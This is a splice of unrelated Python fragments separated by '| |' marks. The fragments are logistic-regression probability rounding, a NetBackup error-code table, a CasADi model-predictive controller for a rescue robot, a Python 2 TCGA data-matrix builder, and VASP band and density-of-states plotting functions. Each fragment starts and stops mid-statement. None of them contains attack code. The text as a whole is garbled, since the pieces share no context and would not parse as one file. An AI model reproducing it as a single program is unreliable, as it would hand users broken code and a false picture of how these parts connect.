_11P4 = round(Value_11[0][9],6)
_11P5 = round(Value_11[0][10],6)
Value_12 = logreg_12.predict_proba(feat12)
_12N5 = round(Value_12[0][0],6)
_12N4 = round(Value_12[0][1],6)
_12N3 = round(Value_12[0][2],6)
_12N2 = round(Value_12[0][3],6)
_12N1 = round(Value_12[0][4],6)
_12P1 = round(Value_12[0][6],6)
_12P2 = round(Value_12[0][7],6)
_12P3 = round(Value_12[0][8],6)
_12P4 = round(Value_12[0][9],6)
_12P5 = round(Value_12[0][10],6)
Value_13 = logreg_13.predict_proba(feat13)
_13N5 = round(Value_13[0][0],6)
_13N4 = round(Value_13[0][1],6)
_13N3 = round(Value_13[0][2],6)
_13N2 = round(Value_13[0][3],6)
_13N1 = round(Value_13[0][4],6)
_13P1 = round(Value_13[0][6],6)
_13P2 = round(Value_13[0][7],6)
_13P3 = round(Value_13[0][8],6) | |
found",
228: "unable to process request",
229: "events out of sequence - image inconsistency",
230: "the specified policy does not exist in the configuration database",
231: "schedule windows overlap",
232: "a protocol error has occurred",
233: "premature eof encountered",
234: "communication interrupted",
235: "inadequate buffer space",
236: "the specified client does not exist in an active policy within the configuration database",
237: "the specified schedule does not exist in an active policy in the configuration database",
238: "the database contains conflicting or erroneous entries",
239: "the specified client does not exist in the specified policy",
240: "no schedules of the correct type exist in this policy",
241: "the specified schedule is the wrong type for this request",
242: "operation would cause an illegal duplication",
243: "the client is not in the configuration",
245: "the specified policy is not of the correct client type",
246: "no active policies in the configuration database are of the correct client type",
247: "the specified policy is not active",
248: "there are no active policies in the configuration database",
249: "the file list is incomplete",
250: "the image was not created with TIR information",
251: "the tir information is zero length",
252: "An extended error status has been encountered, check detailed status",
253: "the catalog image .f file has been archived",
254: "server name not found in the NetBackup configuration",
256: "logic error encountered",
257: "failed to get job data",
258: "Vault duplication was aborted by administrator request",
259: "vault configuration file not found",
260: "failed to send signal",
261: "vault internal error 261",
262: "vault internal error 262",
263: "session ID assignment failed",
265: "session ID file is empty or corrupt",
266: "cannot find robot, vault, or profile in the vault configuration",
267: "cannot find the local host name",
268: "the vault session directory is either missing or inaccessible",
269: "no vault session ID was found",
270: "unable to obtain process id, getpid failed",
271: "vault XML version mismatch",
272: "execution of a vault notify script failed",
273: "invalid job id",
274: "no profile was specified",
275: "a session is already running for this vault",
276: "invalid session ID",
277: "unable to print reports",
278: "unable to collect pre eject information from the API",
279: "eject process is complete",
280: "there are no volumes to eject",
281: "vault core error",
282: "cannot connect to nbvault server",
283: "error(s) occurred during vault report generation",
284: "error(s) occurred during vault report distribution",
285: "unable to locate vault directory",
286: "vault internal error",
287: "vault eject failed",
288: "vault eject partially succeeded",
289: "cannot consolidate reports of sessions from container and slot-based vaults",
290: "one or more errors detected during eject processing",
291: "number of media has exceeded capacity of MAP; must perform manual eject using vltopmenu or vlteject",
292: "eject process failed to start",
293: "eject process has been aborted",
294: "vault catalog backup failed",
295: "eject process could not obtain information about the robot",
296: "process called but nothing to do",
297: "all volumes are not available to eject",
298: "the library is not ready to eject volumes",
299: "there is no available MAP for ejecting",
300: "vmchange eject verify not responding",
301: "vmchange api_eject command failed",
302: "error encountered trying backup of catalog (multiple tape catalog backup)",
303: "error encountered executing Media Manager command",
304: "specified profile not found",
305: "multiple profiles exist",
306: "vault duplication partially succeeded",
307: "eject process has already been run for the requested Vault session",
308: "no images duplicated",
309: "report requested without eject being run",
310: "Updating of Media Manager database failed",
311: "Iron Mountain Report is already created for this session",
312: "invalid container database entry",
313: "container does not exist in container database",
314: "container database truncate operation failed",
315: "failed appending to container database",
316: "container_id is not unique in container database",
317: "container database close operation failed",
318: "container database lock operation failed",
319: "container database open operation failed",
320: "the specified container is not empty",
321: "container cannot hold any media from the specified robot",
322: "cannot find vault in vault configuration file",
323: "cannot find robot in vault configuration file",
324: "invalid data found in retention map file for duplication",
325: "unable to find policy/schedule for image using retention mapping",
326: "specified file contains no valid entry",
327: "no media ejected for the specified vault session",
328: "invalid container ID",
329: "invalid recall status",
330: "invalid database host",
331: "invalid container description",
332: "error getting information from EMM database",
333: "error getting information from media manager command line",
334: "unable to receive response from robot; robot not ready.",
335: "failure occurred while suspending media for eject",
336: "failure occurred while updating session information",
337: "failure occurred while updating the eject.mstr file",
338: "vault eject timed out",
339: "vault configuration file format error",
340: "vault configuration tag not found",
341: "vault configuration serialization failed",
342: "cannot modify - stale view",
343: "robot already exists",
344: "vault already exists",
345: "profile already exists",
346: "duplicate MAP",
347: "vault configuration cache not initialized",
348: "specified report does not exist",
349: "incorrect catalog backup policy",
350: "incorrect vault catalog backup schedule",
351: "all configured vault steps failed",
400: "Server Group Type is Invalid",
401: "Server Group Already Exists",
402: "Server Group Already Exists with a different type",
403: "Server Group Active State is not valid",
404: "Server Group does not exist",
405: "Member’s server type not compatible with Server Group",
406: "The computer specified is not a member of the server group specified",
407: "Member’s NetBackup version not compatible with Server Group",
408: "Server Group is in use",
409: "Member already exists in server group",
501: "You are not authorized to use this application.",
502: "No authorization entry exists in the auth.conf file for user name username. None of the NetBackup Java applications are available to you.",
503: "Invalid user name.",
504: "Incorrect password.",
505: "Cannot connect to the NetBackup Java authentication service on host on the configured port - (port_number). Check the log file for more details.",
506: "Cannot connect to the NetBackup Java user service on host on port port_number. If successfully logged in before, retry your last operation. Check the log file for more details.",
507: "Socket connection to the NetBackup Java user service has been broken. Retry your last operation. Check the log file for more details.",
508: "Cannot write file.",
509: "Cannot execute program.",
510: "File already existsfile_name",
511: "NetBackup Java application server interface error.",
512: "Internal error - a bad status packet was returned by NetBackup Java application server that did not contain an exit status code.",
513: "bpjava-msvcthe client is not compatible with this server version (server_version).",
514: "NetBackup Javabpjava-msvc is not compatible with this application version (application_version). You may try logon to a different NetBackup host or exit the application. The remote NetBackup host has to be configured with the same version of NetBackup as the host you started the application on.",
516: "Could not recognize or initialize the requested locale - (locale_NetBackup Java_was_started_in).",
517: "Cannot connect to the NetBackup Java user service by VNETD on host on port configured_port_number. If successfully logged on beforehand, retry your last operation. Check the log file for more details.",
518: "No ports available in range (port_number) through (port_number) per the NBJAVA_CLIENT_PORT_WINDOW configuration option.",
519: "Invalid NBJAVA_CLIENT_PORT_WINDOW configuration option value: (option_value).",
520: "Invalid value for NetBackup Java configuration option (option_name): (option_value).",
521: "NetBackup Java Configuration file (file_name) does not exist.",
522: "NetBackup Java Configuration file (file_name) is not readable due to the following error: (message).",
523: "NetBackup Java application server protocol error.",
525: "Cannot connect to the NetBackup Java authentication service by VNETD on (host) on port (vnetd_configured_port_number). Check the log file for more details.",
526: "bpjava authentication service connection failed",
527: "bpjava user service connection if connection to pbx on port 1556 fails",
537: "Connection to the NetBackup database was not successful. Ensure that the database service is running.",
538: "unable to login",
552: "The Certificate Revocation List (CRL) could not be downloaded and, therefore, the certificate revocation status could not be verified. For more information, see the NetBackup logs.",
600: "an exception condition occurred",
601: "unable to open listen socket",
602: "cannot set non-blocking mode on the listen socket",
603: "cannot register handler for accepting new connections",
604: "no target storage unit specified for the new job",
605: "received error notification for the job",
606: "no robot on which the media can be read",
607: "no images were found to synthesize",
608: "storage unit query failed",
609: "reader failed",
610: "endpoint terminated with an error",
611: "no connection to reader",
612: "cannot send extents to bpsynth",
613: "cannot connect to read media server",
614: "cannot start reader on the media server",
615: "internal error 615",
616: | |
<reponame>roni-permana-saputra/HiDO-MPC-ResQbot
"""
HiDO-MPC Class ResQbot
author: <NAME>
2021
"""
from casadi import *
import numpy as np
import time
def cal_heading_line(target_pose):
# line define by ax + by + c = 0
# tan_theta = -(a/b)
tan_theta = np.tan(target_pose.yaw)
b = -1
a = tan_theta
c = -((a*target_pose.x)+(b*target_pose.y))
return a, b, c
def cal_constrain_line(target_pose):
a,b,c = cal_heading_line(target_pose)
a1 = b
b1 = -a
c1 = -((a1*target_pose.x) + (b1*target_pose.y))
return np.array([a1, b1, c1])
def cal_dist2line(current_pose, target_pose):
tan_theta = np.tan(target_pose[2])
b = -1
a = tan_theta
c = -((a*target_pose[0])+(b*target_pose[1]))
dist2line = (fabs((a*current_pose[0])+(b*current_pose[1])+c))/(np.sqrt((a**2)+(b**2)))
return dist2line
class MPC_single_shooting_multi_objective():
def __init__(self, T, N, v_max, v_min, w_max, w_min, mpc_type):
# Parameters
# -----------------------------------
# Initialisation
# Init all parameters
# for formulation
# T : sampling time
# N : prediction horizon
# v_max : maximum linear speed
# v_min : minimum linear speed
# w_max : maximum angular speed
# w_min : minimum angular speed
# -----------------------------------
self.T = T
self.N = N
self.v_max = v_max
self.v_min = v_min
self.w_max = w_max
self.w_min = w_min
self.mpc_type = mpc_type
# Weight
self.aaa = 36.56724647970869
self.bbb = 1.1258826676004698
self.ccc = 7.377948408873998
self.ddd = 68.01501281612002
self.eee = 60.088582798687845
self.fff = 96.78399611800188
self.ggg = 10.752561956173809
self.hhh = 98.01002847504917
self.iii = 93.03643454111301
self.jjj = 95.28025019237253
self.kkk = 71.1610072822886
self.lll = 11.324284624727976
self._form_model()
self._form_obj()
self._form_const()
self._form_OPT_variables()
self.form_args()
# -------------------------
# Model Formulation
# -------------------------
def _form_model(self):
# Robot State
x = SX.sym('x')
y = SX.sym('y')
theta = SX.sym('theta')
v = SX.sym('v')
w = SX.sym('w')
states = vertcat(x, y, theta, v, w)
n_states = states.size(1)
# Control State
a = SX.sym('a')
alpha = SX.sym('alpha')
controls = vertcat(a, alpha)
n_controls = controls.size(1)
# State Transition Function
rhs = vertcat(v*cos(theta), v*sin(theta), w, a, alpha) # system r.h.s
# nonlinear mapping function f(x,u)
f = Function('f',[states, controls],[rhs])
self.f = f
# Decission Variables Matrix
# This case is single-shooting
# Decision variables only consists of control sequence
U = SX.sym('U',n_controls,self.N) # Matrix U n_controls by N (symbolic)
self.U = U
# Parameters Vector
# This vector consists of:
# 1. the initial and
# 2. the reference state of the robot
# 3. the rprevious control
P = SX.sym('P',n_states + n_states)
self.P = P
# State Prediction Matrix
# A Matrix (n_states,(N+1)) that represents
# the states over the optimization problem.
X = SX.sym('X',n_states,(self.N+1))
# State Prediction Model
# Compute State Prediction Recursively
# based on State Transition Model
X[:,0] = P[0:5] # initial state
for k in range(self.N):
st = X[:,k]
con = U[:,k]
f_value = f(st,con)
st_next = st + (self.T*f_value)
X[:,k+1] = st_next
self.X = X
# Function to calculate optimat prediction trajectory
# Given optimal function obtained from the optimisation
ff=Function('ff',[U,P],[X])
self.ff = ff
# -------------------------------
# Objective Function Formulation
# -------------------------------
def _form_obj(self):
# Classical MPC cost function formulation
#
# Obj = SIGMA(State_Deviation_Objectives + Control_Deviation_Objectives)
# State_Deviation_Objectives =
# mtimes(mtimes(transpose((st-self.P[3:6])),Q),(st-self.P[3:6]))
# Control_Deviation_Objectives =
# mtimes(mtimes(transpose(con),R),con)
# Q = weighing matrices (states)
# R = weighing matrices (controls)
Q = SX.zeros(3,3); Q[0,0] = 1
Q[1,1] = 5; Q[2,2] = 0.1
R = SX.zeros(2,2)
R[0,0] = 0.1; R[1,1] = 0.01
# Compute Objective
self.obj = 0
if self.mpc_type==0:
for k in range(self.N):
st = self.X[:,k]
con = self.U[:,k]
target = self.P[5:10]
dist2line = self.cal_dist2line_cost(st[0:3], target[0:3])
self.obj = self.obj+self.aaa*dist2line+self.bbb*mtimes(mtimes(transpose(st[3:5]),R),st[3:5])+self.ccc*mtimes(mtimes(transpose(con),R),con)
elif self.mpc_type==1:
for k in range(self.N):
st = self.X[:,k]
con = self.U[:,k]
target = self.P[5:10]
dist2line = self.cal_dist2line_cost(st[0:3], target[0:3])
dist_obj = ((st[0]-self.P[5])**2)+((st[1]-self.P[6])**2)
angle_diff = ((st[2]-self.P[7])**2)
self.obj = self.obj+self.ddd*dist2line+self.eee*angle_diff+self.fff*mtimes(mtimes(transpose(st[3:5]),R),st[3:5])+self.ggg*mtimes(mtimes(transpose(con),R),con)
elif self.mpc_type==2:
for k in range(self.N):
st = self.X[:,k]
con = self.U[:,k]
target = self.P[5:10]
dist2line = self.cal_dist2line_cost(st[0:3], target[0:3])
dist_obj = ((st[0]-self.P[5])**2)+((st[1]-self.P[6])**2)
angle_diff = ((st[2]-self.P[7])**2)
self.obj = self.obj+self.hhh*dist2line+self.iii*dist_obj+self.jjj*angle_diff+self.kkk*mtimes(mtimes(transpose(st[3:5]),R),st[3:5])+self.lll*mtimes(mtimes(transpose(con),R),con)
def cal_dist2line_cost(self, current_pose, target_pose):
a,b,c = self.cal_heading_line(target_pose)
dist2line = (((a*current_pose[0])+(b*current_pose[1])+c)**2)
return dist2line
# -------------------------------
# Constraints Formulation
# ------------------------------
# Stacking all constraint variable elements
def _form_const(self):
self.g = []
# 1. Safety constrain
# Constraining distance from the robot into safety line
for k in range(self.N+1):
self.g = vertcat(self.g, self.X[0,k])
self.n_safety_constraints = self.g.shape[0]
# 2. Robot geometrics constrain
# Constraining all points in vehicle contours
# in y direction
for k in range(self.N+1):
self._calc_global_vehicle_contour(self.X[0:3,k])
for j in range(len(self.gvy)):
self.g = vertcat(self.g, self.gvy[j])
self.n_geometric_constraints = self.g.shape[0]
# 3. Linear speed constrain
for k in range(self.N+1):
self.g = vertcat(self.g, self.X[3,k])
self.n_linear_speed_constraints = self.g.shape[0]
# 3. Angular speed constrain
for k in range(self.N+1):
self.g = vertcat(self.g, self.X[4,k])
self.n_angular_speed_constraints = self.g.shape[0]
def _calc_global_vehicle_contour(self, st):
v_x = [-0.4, -0.3, 1.4, 1.5, 1.4, -0.3, -0.4]
v_y = [0.0, -0.3, -0.3, 0.0, 0.3, 0.3, 0.0]
self.gvx = [(ix * np.cos(st[2,0]) + iy * np.sin(st[2,0])) +
st[0,0] for (ix, iy) in zip(v_x, v_y)]
self.gvy = [(ix * np.sin(st[2,0]) - iy * np.cos(st[2,0])) +
st[1,0] for (ix, iy) in zip(v_x, v_y)]
# -----------------------------------
# Formulising Non Linear Programming
# Optimisation Problem
# -----------------------------------
def _form_OPT_variables(self):
# Formulise decision variable
OPT_variables = reshape(self.U,2*self.N,1)
# Formulise nlp problem
# Elements:
# 1. Objective function ---> f
# 2. Decision Variables ---> 'x': OPT_variables
# 3. Constraints ---> 'g': g
# 4. Parameter ---> 'p': P
nlp_prob = {'f': self.obj, 'x': OPT_variables, 'g': self.g, 'p': self.P}
# Set Hyperparameter for Optimiser
# We use 'ipopt' optimiser
# Check the hyperparameter in:
opts = {'ipopt': {'max_iter': 100, 'print_level': 0, 'print_frequency_time': 0,
'acceptable_tol': 1e-8, 'acceptable_obj_change_tol': 1e-6} }
# Formulise optimisation solver
# Solver ---> 'nlpsol'
# solver_setting ---> nlp_prob
# Optimiser ---> 'ipopt'
# optimiser_setting ---> opts
solver = nlpsol('solver', 'ipopt', nlp_prob, opts)
self.solver = solver
# -----------------------------------
# Formulising Arguments
# Constraints arguments
# -----------------------------------
def form_args(self, lbg=-20.0, ubg=20.0 ):
# Set Arguments as Dictionary on Python
# Elements:
# 1. 'lbg' ---> Lower bound from g (constraint variables)
# 2. 'ubg' ---> Upper bound from g (constraint variables)
# 3. 'lbx' ---> Lower bound from x (decision variables)
# 4. 'ubx' ---> Upper bound from x (decision variables)
args = dict()
# 1. inequality function for constraints variables
array_lbg = np.zeros(self.g.shape)
array_ubg = np.zeros(self.g.shape)
# Arguments for safety constraits
array_lbg[0:self.n_safety_constraints,:] = 0.5
array_ubg[0:self.n_safety_constraints,:] = 1.5
# Arguments for robot geometric constraints
array_lbg[self.n_safety_constraints+1:self.n_geometric_constraints,:] = -0.9
array_ubg[self.n_safety_constraints+1:self.n_geometric_constraints,:] = 0.9
# Arguments for robot linear speed constraints
array_lbg[self.n_geometric_constraints+1:self.n_linear_speed_constraints,:] = -0.5
array_ubg[self.n_geometric_constraints+1:self.n_linear_speed_constraints,:] = 0.5
# Arguments for robot angular speed constraints
array_lbg[self.n_linear_speed_constraints+1:self.g.shape[0],:] = -0.25
array_ubg[self.n_linear_speed_constraints+1:self.g.shape[0],:] = 0.25
# Combaining and input to the dictionary
args['lbg'] = array_lbg # lower bound of the states x and y
args['ubg'] = array_ubg # upper bound of the states x and y
# 2. inequality function for decission variables
lbx = np.zeros((2*self.N,1))
lbx[range(0, 2*self.N, 2),0] = -1.15 #self.v_min
lbx[range(1, 2*self.N, 2),0] = -0.5 #self.w_min
ubx = np.zeros((2*self.N,1))
ubx[range(0, 2*self.N, 2),0] = 0.5 #self.v_max
ubx[range(1, 2*self.N, 2),0] = 0.5 #self.w_max
# Combaining and input to the dictionary
args['lbx'] = lbx # lower bound of the inputs v and omega
args['ubx'] = ubx # upper bound of the inputs v and omega
self.args = args
# -----------------------------------
# Solving the NLP
# -----------------------------------
def mpc_solver(self, p, u0):
mpc_x0 = reshape(transpose(u0),2*self.N,1) # initial value of the optimization variables
sol = self.solver(x0=mpc_x0,
lbx= self.args['lbx'],
ubx=self.args['ubx'],
lbg=self.args['lbg'],
ubg=self.args['ubg'],
p=p)
return sol
def move_robot(self, x0, u, t0):
st = x0
con = transpose(u)[0,:]
f_value = self.f(st,con)
st = st + (self.T*f_value)
x0 = st
u0 = vertcat(u[1:u.shape[0],:] , u[u.shape[0]-1,:])
t0 = t0 + self.T
return x0, u0, t0
# -----------------------
# Problem for casevac
# -----------------------
def cal_heading_line(self, target_pose):
# line define by ax + by + c = 0
# tan_theta = -(a/b)
tan_theta = np.tan(target_pose[2])
b = -1
a = tan_theta
c = -((a*target_pose[0])+(b*target_pose[1]))
return a, b, c
def cal_constrain_line(self, target_pose):
a,b,c = cal_heading_line(target_pose)
a1 = b
b1 = -a
c1 = -((a1*target_pose.x) + (b1*target_pose.y))
return a1, b1, c1
def | |
should not happen, right ??? "
print aArchive
sys.exit(-1)
else:
mergeArchiveList += [aArchive]
print len(mergeArchiveList), mergeArchiveList[:3], mergeArchiveList[-3:]
print " "
# example list of file names ...
# [ 'BAIZE_p_TCGA_b138_SNP_N_GenomeWideSNP_6_A02_808774.hg19.seg.txt', 'BAIZE_p_TCGA_b138_SNP_N_GenomeWideSNP_6_A03_808754.hg19.seg.txt', ... ]
print len(mergeFileList), mergeFileList[:3], mergeFileList[-3:]
for aFile in fileList:
if (aFile in mergeFileList):
print " (d) this should not happen, right ??? "
print aFile
sys.exit(-1)
else:
mergeFileList += [aFile]
print len(mergeFileList), mergeFileList[:3], mergeFileList[-3:]
print " "
print " "
if (len(mergeSdrfDict) == 0):
print " ERROR ??? nothing returned from SDRFs ... "
sys.exit(-1)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# now we need to get set up for writing the output ...
# NEW: 21dec12 ... assuming that we will write to current working directory
outDir = "./"
outFilename = makeOutputFilename(
outDir, tumorList, platformID, outSuffix)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# in the second pass, we actually *process* all of the files ...
# initialize a bunch of things ...
sampleList = []
gotFiles = []
geneList = []
numGenes = 0
numProc = 0
iS = 0
# and then loop over tumor types ...
for zCancer in tumorList:
print ' '
print ' ********************************** '
print ' LOOP over %d CANCER TYPES ... %s ' % (len(tumorList), zCancer)
# piece together the directory name ...
## topDir = gidgetConfigVars['TCGAFMP_DCC_REPOSITORIES'] + "/dcc-snapshot/public/tumor/" + zCancer + "/cgcc/" + platformID
topDir = gidgetConfigVars['TCGAFMP_DCC_REPOSITORIES'] + "/" + \
snapshotName + "/public/tumor/" + zCancer + "/cgcc/" + platformID
# HACK: the microsat_instability data is in the "secure" branch ...
if (platformID.find("microsat_i") > 0):
topDir = gidgetConfigVars['TCGAFMP_DCC_REPOSITORIES'] + "/" + \
snapshotName + "/secure/tumor/" + \
zCancer + "/cgcc/" + platformID
numSamples = len(mergeFileList)
print " --> setting numSamples ... ", numSamples, len(mergeFileList), len(mergeSdrfDict)
print ' starting from top-level directory ', topDir
dMatch = "Level_3"
if (zPlat == "microsat_i"):
dMatch = "Level_1"
if (not os.path.exists(topDir)):
print ' --> <%s> does not exist ' % topDir
continue
d1 = path.path(topDir)
for dName in d1.dirs():
print dName
if (dName.find(dMatch) >= 0):
print ' '
print ' found a <%s> directory : <%s> ' % (dMatch, dName)
archiveName = getLastBit(dName)
print ' archiveName : ', archiveName
print ' archiveList : ', mergeArchiveList
if (len(mergeArchiveList) == 0):
print " WARNING: in make_Level3_matrix: empty archive list ??? "
continue
# we only look into archives that are in our archive list ... this
# should take care of the problem of grabbing old data ...
# (assuming that we *have* an archive list!)
if (mergeArchiveList[0] != 'unknown'):
if (archiveName not in mergeArchiveList):
continue
d2 = path.path(dName)
print ' looking for txt files in list of length %d ' % (len(d2.files()))
for fName in d2.files():
if (fName.endswith(".txt") >= 0):
fileName = getLastBit(fName)
# similarly, we only read files that are in our file
# list ...
if (fileName not in mergeFileList):
print ' SKIP: this file is not in our list (%s) ' % (fileName)
continue
if (fileName in gotFiles):
print ' SKIP: already read this file (%s) ' % (fileName)
continue
print " processing file : iS=%d %s " % (iS, fileName)
gotFiles += [fileName]
numProc += 1
# -----------------------------------------------------
# these platforms have just one sample's worth of data
# per file
if ((zPlat == "HT_HG-U133A") or (zPlat == "AgilentG4502A_07_1") or (zPlat == "AgilentG4502A_07_2")
or (zPlat == "AgilentG4502A_07_3") or (zPlat == "H-miRNA_8x15K")
or (zPlat == "IlluminaGA_RNASeq") or (zPlat == "IlluminaGA_miRNASeq")
or (zPlat == "IlluminaGA_RNASeqV2")
or (zPlat == "IlluminaHiSeq_RNASeq") or (zPlat == "IlluminaHiSeq_RNASeqV2")
or (zPlat == "IlluminaHiSeq_miRNASeq")
or (zPlat == "HumanMethylation27") or (zPlat == "Genome_Wide_SNP_6")
or (zPlat == "HumanMethylation450") or (zPlat == "MDA_RPPA_Core")
or (zPlat == "microsat_i")):
(barcode, info) = getSampleID(
mergeSdrfDict, fileName)
print barcode, info
sampleList += [barcode]
(geneList, dataVec) = readOneDataFile(fName,
geneList, zPlat, metaData)
# print geneList[:10]
# print dataVec[:10]
if (numGenes == 0):
# for Genome_Wide_SNP_6 segmentations, we don't have a fixed
# number of genes but rather a variable number
# of segmentations ...
if (zPlat == "Genome_Wide_SNP_6"):
# looking at the current set of ~3500 TCGA level-3 segmentations,
# the # of segments per sample is quite highly variable ...
# 50th %ile ~ 700
# 90th %ile ~ 1100
# 97th %ile ~ 3000
# but a few samples far exceed 30,000 ... we will set an upper
# limit at 25000 and then just deal with the samples that exceed that ...
# (though perhaps these are the files that have "do not use" in
# the SDRF file???)
numGenes = 25000
# trying to handle LAML ??? 22feb13
numGenes = 60000
else:
numGenes = len(geneList)
print " --> allocating dataMatrix ... %d x %d " % (numGenes, numSamples)
dataMatrix = [0] * numGenes
for iG in range(numGenes):
dataMatrix[iG] = [0] * numSamples
if (zPlat == "Genome_Wide_SNP_6"):
print " --> allocating segMatrix ... %d x %d " % (numGenes, numSamples)
segMatrix = [0] * numGenes
for iG in range(numGenes):
segMatrix[iG] = [''] * numSamples
if (len(dataVec) > numGenes):
if (zPlat == "Genome_Wide_SNP_6"):
(geneList, dataVec) = mergeSegments(
geneList, dataVec)
else:
print " ERROR ??? should not be here ... now what ? "
sys.exit(-1)
print " getting data from <%s> for barcode <%s> and iS=%3d " % (fName, barcode, iS)
# and write out what we are using to the log file
# ...
if (not logFlag):
# open a log file to which we will write the
# specs for all of the files used ...
fhLog = openDataFreezeLogFile(
zCancer, outSuffix, platformStrings)
logFlag = 1
writeDataFreezeLog(fhLog, fName, barcode)
# for iG in range(numGenes):
for iG in range(len(dataVec)):
try:
dataMatrix[iG][iS] = dataVec[iG]
except:
print " PROBLEM ??? iG=%d iS=%d " % (iG, iS)
sys.exit(-1)
# if this is the GWS6 snp chip, we need to copy the
# segment positions too ...
if (zPlat == "Genome_Wide_SNP_6"):
for iG in range(len(dataVec)):
segMatrix[iG][iS] = geneList[iG]
iS += 1
# -----------------------------------------------------
# we should never get here ...
else:
print " ERROR !!! ??? how did this happen ? unknown platform ? ", zPlat
sys.exit(-1)
print " --> got %d files processed " % numProc
print ' '
print " what do we have here ??? "
print len(sampleList)
print len(gotFiles)
print len(geneList)
print numGenes, numProc, iS
# print ' '
print ' have data matrix of size %d genes x %d samples \n' % (numGenes, numSamples)
print ' '
# print sampleList[:10]
if ((numGenes * numSamples) < 10):
print " ERROR ??? we have essentially no data ??? "
sys.exit(-1)
if (numSamples != len(sampleList)):
print " ERROR ??? how can the number of samples not match the length of the sample list ??? "
print numSamples, len(sampleList)
sys.exit(-1)
# if we get this far, we should make sure that the output directory we
# want exists
print " --> testing that we have an output directory ... <%s> " % outDir
tsvIO.createDir(outDir)
print " output file name will be called <%s> " % outFilename
# finally we write out the data (if it is CN data, first we need to resegment it)
# at this stage, we set a very high level for dropping rows or columns due to missing
# data ... 80% is the value I'm trying out now (3pm Fri 11Feb)
if (zPlat == "Genome_Wide_SNP_6"):
if (1):
# this is better for producing variable-length, hopefully
# uncorrelated, features
steplength = 1000
cutFrac = 0.01
cutFrac = 0.02 # 26may12 : trying | |
calculations. (G is automaticall converted to \\Gamma)
n (int): Number of points between each high symmetry points.
This is also only required for HSE calculations. This number should be
known by the user, as it was used to generate the KPOINTS file.
fontsize (float): Font size of the text in the figure.
save (bool): Determines whether to automatically save the figure or not. If not
the figure and axis are return for further manipulation.
fill (bool): Determines wether or not to fill underneath the plot
alpha (float): Alpha value for the fill
sigma (float): Standard deviation for gaussian filter
Returns:
If save == True, this function will return nothing and directly save the image as
the output name. If save == False, the function will return the matplotlib figure
and axis for further editing.
"""
fig, ax = plt.subplots(
nrows=1,
ncols=2,
sharey=True,
figsize=figsize,
dpi=400,
gridspec_kw={'width_ratios': width_ratios}
)
ax1, ax2 = _figure_setup_band_dos(
ax=ax,
fontsize=fontsize,
ylim=[erange[0], erange[1]]
)
band = Band(
folder=band_folder,
spin=spin,
projected=True,
hse=hse,
kpath=kpath,
n=n,
)
dos = Dos(folder=dos_folder, spin=spin)
band.plot_elements(
ax=ax1,
elements=elements,
scale_factor=scale_factor,
color_list=color_list,
legend=legend,
linewidth=linewidth,
band_color=band_color,
)
dos.plot_elements(
ax=ax2,
elements=elements,
fill=fill,
alpha=alpha,
linewidth=linewidth,
sigma=sigma,
energyaxis='y',
color_list=color_list,
legend=legend,
total=True,
erange=erange,
)
fig.canvas.draw()
nbins = len(ax2.get_xticklabels())
ax2.xaxis.set_major_locator(MaxNLocator(nbins=nbins - 1, prune='lower'))
plt.tight_layout(pad=0.2)
plt.subplots_adjust(wspace=0)
if save:
plt.savefig(output)
else:
return fig, ax1, ax2
def band_dos_element_spd(
band_folder,
dos_folder,
elements,
output='band_dos_element_spd.png',
spin='up',
scale_factor=6,
order=['s', 'p', 'd'],
color_dict=None,
legend=True,
linewidth=0.75,
band_color='black',
figsize=(6, 3),
width_ratios=[7, 3],
erange=[-6, 6],
hse=False,
kpath=None,
n=None,
fontsize=7,
save=True,
fill=True,
alpha=0.3,
sigma=0.05,
):
"""
This function generates a s, p, d projected band structure on specific elements next to a
projected density of states on the s, p, d orbitals for the same elements.
Parameters:
band_folder (str): This is the folder that contains the VASP files for the band structure
dos_folder (str): This is the folder that contains the VASP files for the density of states
output (str): File name of the resulting plot.
spin (str): Choose which spin direction to parse. ('up' or 'down')
scale_factor (float): Factor to scale weights. This changes the size of the
points in the scatter plot
elements (list): List of element symbols to project onto
order (list): This determines the order in which the points are plotted on the
graph. This is an option because sometimes certain orbitals can be hidden
under others because they have a larger weight. For example, if the
weights of the d orbitals are greater than that of the s orbitals, it
might be smart to choose ['d', 'p', 's'] as the order so the s orbitals are
plotted over the d orbitals.
color_dict (dict[str][str]): This option allow the colors of the s, p, and d
orbitals to be specified. Should be in the form of:
{'s': <s color>, 'p': <p color>, 'd': <d color>}
legend (bool): Determines if the legend should be included or not.
linewidth (float): Line width of the plain band structure plotted in the background
band_color (string): Color of the plain band structure
figsize (list / tuple): Desired size of the image in inches (width, height)
width_ratios (list / tuple): Width ration of the band plot and dos plot.
erange (list / tuple): Range of energy to show in the plot [low, high]
kpath (str): High symmetry k-point path of band structure calculation
Due to the nature of the KPOINTS file for HSE calculations this
information is a required input for proper labeling of the figure
for HSE calculations. This information is extracted from the KPOINTS
files for non-HSE calculations. (G is automaticall converted to \\Gamma)
n (int): Number of points between each high symmetry points.
This is also only required for HSE calculations. This number should be
known by the user, as it was used to generate the KPOINTS file.
fontsize (float): Font size of the text in the figure.
save (bool): Determines whether to automatically save the figure or not. If not
the figure and axis are return for further manipulation.
fill (bool): Determines wether or not to fill underneath the plot
alpha (float): Alpha value for the fill
sigma (float): Standard deviation for gaussian filter
Returns:
If save == True, this function will return nothing and directly save the image as
the output name. If save == False, the function will return the matplotlib figure
and axis for further editing.
"""
fig, ax = plt.subplots(
nrows=1,
ncols=2,
sharey=True,
figsize=figsize,
dpi=400,
gridspec_kw={'width_ratios': width_ratios}
)
ax1, ax2 = _figure_setup_band_dos(
ax=ax,
fontsize=fontsize,
ylim=[erange[0], erange[1]]
)
band = Band(
folder=band_folder,
spin=spin,
projected=True,
hse=hse,
kpath=kpath,
n=n,
)
dos = Dos(folder=dos_folder, spin=spin)
band.plot_element_spd(
ax=ax1,
elements=elements,
scale_factor=scale_factor,
order=order,
color_dict=color_dict,
legend=False,
linewidth=linewidth,
band_color=band_color,
)
dos.plot_element_spd(
ax=ax2,
elements=elements,
order=order,
fill=fill,
alpha=alpha,
linewidth=linewidth,
sigma=sigma,
energyaxis='y',
color_dict=color_dict,
legend=legend,
total=True,
erange=erange,
)
fig.canvas.draw()
nbins = len(ax2.get_xticklabels())
ax2.xaxis.set_major_locator(MaxNLocator(nbins=nbins - 1, prune='lower'))
plt.tight_layout(pad=0.2)
plt.subplots_adjust(wspace=0)
if save:
plt.savefig(output)
else:
return fig, ax1, ax2
def band_dos_element_orbitals(
band_folder,
dos_folder,
element_orbital_pairs,
